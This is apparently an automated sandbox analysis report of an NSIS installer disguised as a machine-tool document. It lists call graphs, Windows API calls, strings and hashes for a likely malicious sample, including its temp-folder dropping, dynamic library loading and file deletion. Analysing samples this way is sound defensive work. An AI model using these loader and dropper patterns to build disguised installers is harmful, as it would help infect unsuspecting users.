402355 5307->5312 5313 402a7a RegOpenKeyExA 5308->5313 5310 402325 RegDeleteValueA RegCloseKey 5309->5310 5310->5312 5317 402aa5 5313->5317 5321 402af1 5313->5321 5314 402acb RegEnumKeyA 5315 402add RegCloseKey 5314->5315 5314->5317 5318 406092 5 API calls 5315->5318 5316 402b02 RegCloseKey 5316->5321 5317->5314 5317->5315 5317->5316 5319 402a7a 5 API calls 5317->5319 5320 402aed 5318->5320 5319->5317 5320->5321 5322 402b1d RegDeleteKeyA 5320->5322 5321->5312 5322->5321 5323 402688 5324 402a3a 18 API calls 5323->5324 5325 40268f FindFirstFileA 5324->5325 5326 4026b2 5325->5326 5330 4026a2 5325->5330 5327 4026b9 5326->5327 5331 405c5b wsprintfA 5326->5331 5332 405cfd lstrcpynA 5327->5332 5331->5327 5332->5330 5333 404e8a 5334 404e9a 5333->5334 5335 404eae 5333->5335 5336 404ea0 5334->5336 5345 404ef7 5334->5345 5337 404eb6 IsWindowVisible 5335->5337 5341 404ecd 5335->5341 5339 403f2e SendMessageA 5336->5339 5340 404ec3 5337->5340 5337->5345 5338 404efc CallWindowProcA 5342 404eaa 5338->5342 5339->5342 5346 4047e1 SendMessageA 5340->5346 5341->5338 5351 404861 5341->5351 5345->5338 5347 404840 SendMessageA 5346->5347 5348 404804 GetMessagePos ScreenToClient SendMessageA 5346->5348 5349 404838 5347->5349 5348->5349 5350 40483d 5348->5350 5349->5341 5350->5347 5360 405cfd lstrcpynA 5351->5360 5353 404874 5361 405c5b wsprintfA 5353->5361 5355 40487e 5356 40140b 2 API calls 5355->5356 5357 404887 5356->5357 5362 405cfd lstrcpynA 5357->5362 5359 40488e 5359->5345 5360->5353 5361->5355 5362->5359 5363 401c8a 5364 402a1d 18 API calls 5363->5364 5365 401c90 IsWindow 5364->5365 5366 4019f3 5365->5366 4202 403a0f 4203 403b62 4202->4203 4204 403a27 4202->4204 4206 403bb3 4203->4206 4207 403b73 GetDlgItem GetDlgItem 4203->4207 4204->4203 4205 403a33 4204->4205 4208 403a51 4205->4208 4209 403a3e SetWindowPos 4205->4209 4211 403c0d 4206->4211 4219 401389 2 API calls 4206->4219 4210 403ee2 19 API calls 4207->4210 4212 403a56 ShowWindow 4208->4212 4213 403a6e 4208->4213 4209->4208 
4214 403b9d SetClassLongA 4210->4214 4220 403b5d 4211->4220 4272 403f2e 4211->4272 4212->4213 4216 403a90 4213->4216 4217 403a76 DestroyWindow 4213->4217 4218 40140b 2 API calls 4214->4218 4222 403a95 SetWindowLongA 4216->4222 4223 403aa6 4216->4223 4221 403e6b 4217->4221 4218->4206 4224 403be5 4219->4224 4221->4220 4230 403e9c ShowWindow 4221->4230 4222->4220 4227 403ab2 GetDlgItem 4223->4227 4228 403b4f 4223->4228 4224->4211 4229 403be9 SendMessageA 4224->4229 4225 40140b 2 API calls 4243 403c1f 4225->4243 4226 403e6d DestroyWindow EndDialog 4226->4221 4231 403ae2 4227->4231 4232 403ac5 SendMessageA IsWindowEnabled 4227->4232 4291 403f49 4228->4291 4229->4220 4230->4220 4235 403aef 4231->4235 4236 403b02 4231->4236 4237 403b36 SendMessageA 4231->4237 4246 403ae7 4231->4246 4232->4220 4232->4231 4234 405d1f 18 API calls 4234->4243 4235->4237 4235->4246 4240 403b0a 4236->4240 4241 403b1f 4236->4241 4237->4228 4239 403ee2 19 API calls 4239->4243 4285 40140b 4240->4285 4245 40140b 2 API calls 4241->4245 4242 403b1d 4242->4228 4243->4220 4243->4225 4243->4226 4243->4234 4243->4239 4263 403dad DestroyWindow 4243->4263 4275 403ee2 4243->4275 4247 403b26 4245->4247 4288 403ebb 4246->4288 4247->4228 4247->4246 4249 403c9a GetDlgItem 4250 403cb7 ShowWindow KiUserCallbackDispatcher 4249->4250 4251 403caf 4249->4251 4278 403f04 KiUserCallbackDispatcher 4250->4278 4251->4250 4253 403ce1 EnableWindow 4256 403cf5 4253->4256 4254 403cfa GetSystemMenu EnableMenuItem SendMessageA 4255 403d2a SendMessageA 4254->4255 4254->4256 4255->4256 4256->4254 4279 403f17 SendMessageA 4256->4279 4280 405cfd lstrcpynA 4256->4280 4259 403d58 lstrlenA 4260 405d1f 18 API calls 4259->4260 4261 403d69 SetWindowTextA 4260->4261 4281 401389 4261->4281 4263->4221 4264 403dc7 CreateDialogParamA 4263->4264 4264->4221 4265 403dfa 4264->4265 4266 403ee2 19 API calls 4265->4266 4267 403e05 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4266->4267 4268 401389 2 API calls 4267->4268 4269 403e4b 
4268->4269 4269->4220 4270 403e53 ShowWindow 4269->4270 4271 403f2e SendMessageA 4270->4271 4271->4221 4273 403f46 4272->4273 4274 403f37 SendMessageA 4272->4274 4273->4243 4274->4273 4276 405d1f 18 API calls 4275->4276 4277 403eed SetDlgItemTextA 4276->4277 4277->4249 4278->4253 4279->4256 4280->4259 4283 401390 4281->4283 4282 4013fe 4282->4243 4283->4282 4284 4013cb MulDiv SendMessageA 4283->4284 4284->4283 4286 401389 2 API calls 4285->4286 4287 401420 4286->4287 4287->4246 4289 403ec2 4288->4289 4290 403ec8 SendMessageA 4288->4290 4289->4290 4290->4242 4292 403f61 GetWindowLongA 4291->4292 4302 403fea 4291->4302 4293 403f72 4292->4293 4292->4302 4294 403f81 GetSysColor 4293->4294 4295 403f84 4293->4295 4294->4295 4296 403f94 SetBkMode 4295->4296 4297 403f8a SetTextColor 4295->4297 4298 403fb2 4296->4298 4299 403fac GetSysColor 4296->4299 4297->4296 4300 403fc3 4298->4300 4301 403fb9 SetBkColor 4298->4301 4299->4298 4300->4302 4303 403fd6 DeleteObject 4300->4303 4304 403fdd CreateBrushIndirect 4300->4304 4301->4300 4302->4220 4303->4304 4304->4302 4305 402410 4316 402b44 4305->4316 4307 40241a 4308 402a3a 18 API calls 4307->4308 4309 402423 4308->4309 4310 40242d RegQueryValueExA 4309->4310 4311 4026a6 4309->4311 4312 402453 RegCloseKey 4310->4312 4313 40244d 4310->4313 4312->4311 4313->4312 4320 405c5b wsprintfA 4313->4320 4317 402a3a 18 API calls 4316->4317 4318 402b5d 4317->4318 4319 402b6b RegOpenKeyExA 4318->4319 4319->4307 4320->4312 4321 401f90 4322 401fa2 4321->4322 4323 402050 4321->4323 4324 402a3a 18 API calls 4322->4324 4325 401423 25 API calls 4323->4325 4326 401fa9 4324->4326 4331 4021c9 4325->4331 4327 402a3a 18 API calls 4326->4327 4328 401fb2 4327->4328 4329 401fc7 LoadLibraryExA 4328->4329 4330 401fba GetModuleHandleA 4328->4330 4329->4323 4332 401fd7 GetProcAddress 4329->4332 4330->4329 4330->4332 4333 402023 4332->4333 4334 401fe6 4332->4334 4335 404f16 25 API calls 4333->4335 4336 402005 4334->4336 4337 401fee 4334->4337 4339 401ff6 
4335->4339 4342 100016bd 4336->4342 4384 401423 4337->4384 4339->4331 4340 402044 FreeLibrary 4339->4340 4340->4331 4343 100016ed 4342->4343 4387 10001a5d 4343->4387 4345 100016f4 4346 1000180a 4345->4346 4347 10001705 4345->4347 4348 1000170c 4345->4348 4346->4339 4436 100021b0 4347->4436 4419 100021fa 4348->4419 4353 10001731 4355 10001770 4353->4355 4356 10001752 4353->4356 4354 10001722 4362 10001733 4354->4362 4363 10001728 4354->4363 4358 100017b2 4355->4358 4359 10001776 4355->4359 4449 100023da 4356->4449 4367 100023da 11 API calls 4358->4367 4365 10001559 3 API calls 4359->4365 4360 1000173b 4360->4353 4446 10002aa3 4360->4446 4361 10001758 4460 10001559 4361->4460 4440 10002589 4362->4440 4363->4353 4430 100027e8 4363->4430 4370 1000178c 4365->4370 4371 100017a4 4367->4371 4374 100023da 11 API calls 4370->4374 4375 100017f9 4371->4375 4471 100023a0 4371->4471 4373 10001739 4373->4353 4374->4371 4375->4346 4379 10001803 GlobalFree 4375->4379 4379->4346 4381 100017e5 4381->4375 4475 100014e2 wsprintfA 4381->4475 4382 100017de FreeLibrary 4382->4381 4385 404f16 25 API calls 4384->4385 4386 401431 4385->4386 4386->4339 4478 10001215 GlobalAlloc 4387->4478 4389 10001a81 4479 10001215 GlobalAlloc 4389->4479 4391 10001cbb GlobalFree GlobalFree GlobalFree 4393 10001cd8 4391->4393 4412 10001d22 4391->4412 4392 10001a8c 4392->4391 4396 10001b60 GlobalAlloc 4392->4396 4400 10001bab lstrcpyA 4392->4400 4401 10001bc9 GlobalFree 4392->4401 4403 10001bb5 lstrcpyA 4392->4403 4406 10001f7a 4392->4406 4392->4412 4413 10001c07 4392->4413 4414 10001e75 GlobalFree 4392->4414 4417 10001224 2 API calls 4392->4417 4485 10001215 GlobalAlloc 4392->4485 4394 1000201a 4393->4394 4395 10001ced 4393->4395 4393->4412 4397 1000203c GetModuleHandleA 4394->4397 4394->4412 4395->4412 4482 10001224 4395->4482 4396->4392 4398 10002062 4397->4398 4399 1000204d LoadLibraryA 4397->4399 4486 100015a4 GetProcAddress 4398->4486 4399->4398 4399->4412 4400->4403 4401->4392 4403->4392 4404 10002074 
Control-flow Graph
APIs
• SetErrorMode.KERNELBASE ref: 004030FE
• GetVersion.KERNEL32 ref: 00403104
• #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403153
• OleInitialize.OLE32(00000000), ref: 0040315A
• SHGetFileInfoA.SHELL32(0041ECE0,00000000,?,00000160,00000000), ref: 00403176
• GetCommandLineA.KERNEL32(00422F20,NSIS Error), ref: 0040318B
• GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe",00000000), ref: 0040319E
• CharNextA.USER32(00000000,"C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe",00000020), ref: 004031C9
• GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032C6
• GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032D7
• lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032E3
• GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032F7
• lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004032FF
• SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403310
• SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403318
• DeleteFileA.KERNELBASE(1033), ref: 0040332C
  • Part of subcall function 00406092: GetModuleHandleA.KERNEL32(?,?,?,00403147,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004060A4
  • Part of subcall function 00406092: GetProcAddress.KERNEL32(00000000,?), ref: 004060BF
• OleUninitialize.OLE32(?), ref: 004033DA
  • Part of subcall function 004054F3: MessageBoxIndirectA.USER32(00409230), ref: 0040554E
• ExitProcess.KERNEL32 ref: 004033FB
Memory Dump Source
• Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
Similarity
• API ID: EnvironmentFileHandleModulePathTempVariablelstrcat$AddressCharCommandDeleteDirectoryErrorExitIndirectInfoInitializeLineMessageModeNextProcProcessUninitializeVersionWindows
• String ID: "$"C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe$C:\Users\user\falden\myotonias\nonvoting$C:\Users\user\falden\myotonias\nonvoting\Kontrakttillgs$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu$A
• API String ID: 2526692829-2327213740
• Opcode ID: 5d32af4ea543c0817f9c1176b523a64e399aa3e0298921c02971181efbbc86ca
• Instruction ID: bda156f374487f2bbb29673c031f74f644c2b1eaea70be50b0a917a6d4bf9e43
• Opcode Fuzzy Hash: 5d32af4ea543c0817f9c1176b523a64e399aa3e0298921c02971181efbbc86ca
• Instruction Fuzzy Hash: 17C1E6706082427AE7116F719D4DA2B3EACEB8570AF04457FF542B51E2CB7C9A058B2E

Control-flow Graph
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 004050B3
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004050C2
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004050FF
                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 00405106
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405127
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405138
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040514B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405159
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040516C
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040518E
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 004051A2
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004051C3
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051D3
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051EC
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004051F8
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 004050D1
                                                                                                                                                                                                                            • Part of subcall function 00403F17: SendMessageA.USER32(00000028,?,?,00403D48), ref: 00403F25
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405214
                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00004FE8,00000000), ref: 00405222
                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 00405229
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 0040524C
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405253
                                                                                                                                                                                                                          • ShowWindow.USER32(00000008), ref: 00405299
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052CD
                                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 004052DE
                                                                                                                                                                                                                          • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004052F3
                                                                                                                                                                                                                          • GetWindowRect.USER32(?,000000FF), ref: 00405313
                                                                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040532C
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405368
                                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405378
                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 0040537E
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 00405387
                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405391
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053A5
                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004053BE
                                                                                                                                                                                                                          • SetClipboardData.USER32(?,00000000), ref: 004053C9
                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 004053CF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                          • String ID: Hil Setup: Installing$LN
                                                                                                                                                                                                                          • API String ID: 590372296-1526829629
                                                                                                                                                                                                                          • Opcode ID: ad5356adce3bb94830d25055b8f3bb936a018a1acfa821f759bd6897c2926a05
                                                                                                                                                                                                                          • Instruction ID: a6ff68720be7f0e5d6bf60450920f0594ccff0b83ae89a6b9846e031650dbd60
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad5356adce3bb94830d25055b8f3bb936a018a1acfa821f759bd6897c2926a05
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31A16B71900209BFDB119FA0DD89AAE7B79FB08354F10407AFA01B62A0C7B55E419F69

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetVersion.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000,00404F4E,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000), ref: 00405DD0
                                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E4B
                                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405E5E
                                                                                                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,0040E8D8), ref: 00405E9A
                                                                                                                                                                                                                          • SHGetPathFromIDListA.SHELL32(0040E8D8,Call), ref: 00405EA8
                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(0040E8D8), ref: 00405EB3
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405ED5
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000,00404F4E,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000), ref: 00405F27
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                                                                                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                          • API String ID: 900638850-734914626
                                                                                                                                                                                                                          • Opcode ID: 72fca3c0d226cb4ffd2584a1df3709eed3dbe51e320ebdd5a95bbc0a956f9115
                                                                                                                                                                                                                          • Instruction ID: 0882c4b3dedd804cc86cf07441b0505b0d3b9fa6fe4ef2b0f086a7f01eec187c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72fca3c0d226cb4ffd2584a1df3709eed3dbe51e320ebdd5a95bbc0a956f9115
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D261F171A04A02ABDF209F24CC8877B3BA4EB55315F14813BE941BA2D0D27D4A42DF9E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001B67
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
Memory Dump Source
• Source File: 00000000.00000002.1507773811.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1507731690.0000000010000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.1507814859.0000000010003000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.1507849586.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4227406936-0

Control-flow Graph

[Figure: control-flow graph starting at block 40559f-4055c5; legend: Executed / Not Executed]
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DeleteFileA.KERNELBASE(?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055C8
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00420D28,\*.*,00420D28,?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405610
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00409014,?,00420D28,?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405631
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00409014,?,00420D28,?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405637
                                                                                                                                                                                                                          • FindFirstFileA.KERNELBASE(00420D28,?,?,?,00409014,?,00420D28,?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405648
                                                                                                                                                                                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004056F5
                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405706
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004055AC
                                                                                                                                                                                                                          • "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe", xrefs: 0040559F
                                                                                                                                                                                                                          • (B, xrefs: 004055F8
                                                                                                                                                                                                                          • \*.*, xrefs: 0040560A
Memory Dump Source
• Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"$(B$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                                                          • API String ID: 2035342205-233157525

Control-flow Graph

[Figure: control-flow graph starting at block 401751-401774; legend: Executed / Not Executed]
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\falden\myotonias\nonvoting\Kontrakttillgs,00000000,00000000,00000031), ref: 00401790
                                                                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\falden\myotonias\nonvoting\Kontrakttillgs,00000000,00000000,00000031), ref: 004017BA
                                                                                                                                                                                                                            • Part of subcall function 00405CFD: lstrcpynA.KERNEL32(?,?,00000400,0040318B,00422F20,NSIS Error), ref: 00405D0A
                                                                                                                                                                                                                            • Part of subcall function 00404F16: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4F
                                                                                                                                                                                                                            • Part of subcall function 00404F16: lstrlenA.KERNEL32(00402FCF,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5F
                                                                                                                                                                                                                            • Part of subcall function 00404F16: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00402FCF,00402FCF,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000,0040E8D8,00000000), ref: 00404F72
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll), ref: 00404F84
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC4
                                                                                                                                                                                                                            • Part of subcall function 00404F16: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FD2
                                                                                                                                                                                                                          Strings
